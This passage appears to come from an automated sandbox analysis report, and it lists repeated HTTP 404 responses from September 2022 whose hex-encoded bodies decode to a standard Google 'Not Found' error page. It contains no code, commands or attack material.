70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:48 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:49 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:50 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:51 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:52 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:58 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:58 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 